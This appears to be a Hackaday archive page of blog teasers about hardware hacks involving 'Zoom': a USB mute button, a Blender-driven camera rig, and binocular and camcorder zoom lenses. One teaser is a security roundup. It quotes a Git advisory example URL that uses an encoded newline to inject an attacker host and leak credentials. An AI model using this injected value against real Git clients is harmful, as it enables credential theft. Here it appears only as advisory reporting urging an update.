Quickly Mute And Unmute Yourself Using The Physical Mute Button

With many conferences moving to fully virtual this year, video conferencing will continue to be a mainstay in our lives for the foreseeable future. [Elliot] wanted to spice up his video conferencing experience just a bit and make his experience a bit more ergonomic. We’ve all had the problem of looking for our Zoom window buried behind any number of other applications, desperately searching for the mute button. Furthermore, when we get called on, we’re desperately trying to give the impression that we’ve been paying attention the entire time, even when we haven’t been.

To solve all these problems, he built a physical mute button to easily toggle the mute option on and off during Zoom calls. The device takes advantage of the native USB feature of his Digispark board, and a few built-in keyboard shortcuts in Zoom. With native USB, the Digispark board can act like a keyboard, making it really simple to emulate keyboard presses using the microcontroller. Throw in an arcade-style button and do a bit of handcrafting and you have yourself your own physical mute button.

We were really impressed by the simplicity of the design as well as the elegance of the mechanical assembly. [Elliot] even made a revamped version with a second button allowing him to control his video as well. Cool button(s) [Elliot]!

What’s your favorite work-from-home hack? Check out some of our favorites here on Hackaday.

Continue reading “Quickly Mute And Unmute Yourself Using The Physical Mute Button”

This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

Git released an update on Tuesday, fixing an issue that could result in leaking credentials. The vulnerability was in how Git handles an HTTP URL containing a newline. Looking at the commits in 2.26.1, we can find an example of an attack:
url = "https://one.example.com?%0ahost=two.example.com/foo.git"

So doing a git pull against this repository will connect your git instance to an attacker’s server, but using the credentials from an arbitrary server. It seems like this could potentially be used to steal Github credentials, for instance. So go make sure you have an updated Git client.
Continue reading “This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation”

Complex Camera Rig Controlled With Blender 3D

blender-3d-camera-control

This is a pretty intricate camera mount. Not only does it provide pan and tilt as the subtitles state, but it moves along a track and offers zoom and focus controls. Its great, but you’ll need an equally complex set of controls to do anything meaningful with it. That’s where the real hack comes into play. The entire system is controlled by its virtual model in Blender 3D.

You probably already know that Blender 3D is an open source 3-dimensional modeling suite. It’s got a mountain of features, which include a framework for animating virtual objects. The camera rig was replicated inside of the software, and includes a skeleton that moves just like the real thing. You can make an animation of how the camera should move, then export and play back those motions on the physical hardware.

Now if you need help making 3D models of your hardware perhaps you should try scanning them.

Continue reading “Complex Camera Rig Controlled With Blender 3D”

Binoculars As A Zoom Lens

It may seem trivial at first, but the effect [Dan] gets when using binoculars as a telephoto lens is surprising. The images are well in focus with great colors. This technique not only brings your subject mater closer but also provides a depth-of-focus feature not normally available on simple cameras or camera phones.

The proof is in the example footage found after the break, but you’ll also find a video tutorial detailing the build. [Dan] already had the expensive components are a pair of mini binoculars and a Kodak Zx3 pocket camcorder. The camcorder is the same form factor as a smart phone so using different hardware will be a breeze. He started off by building a prototype out of paper. Basically it’s a bracket that properly aligns the camera with one lens of the binoculars. Once he had everything lined up he transferred his measurements to some sheet metal. The bracket for the binoculars is attached to the one for the camera using bolts and wing nuts to make it adjustable. One important part of the design is to gut a hole for access to the binocular focus wheel.

Continue reading “Binoculars As A Zoom Lens”

A Zoom Lens For Your Webcam

We need to find the kind of friends that [Dino] has. They seem to drop off all of their older, yet totally awesome, electronics with him once they’re through with the devices. One example of this is the Sony Handycam that came into his possession. He decided to crack it open and repurpose the 20x optical zoom lens for use with a webcam.

We always like [Dino’s] style. You can tell that he has no idea if he’s going to be able to pull off his goal, but at the same time he has an intuitive sense that he’ll make it happen. In the video after the break he starts off investigating what components are in the camera. At first the lens is passing no light at all, but he just strips down parts until he can see through it.

There are a couple of servo motors which control zoom and focus. He removes those before attaching the CCD from a Logitech webcam. At the end of his video he shows a demo of the functionality, which is pretty finicky when focusing by hand. But we think this hack would make a fantastic camera for soldering projects, it just needs a custom controller so the motors can be once again used to adjust focus.

Continue reading “A Zoom Lens For Your Webcam”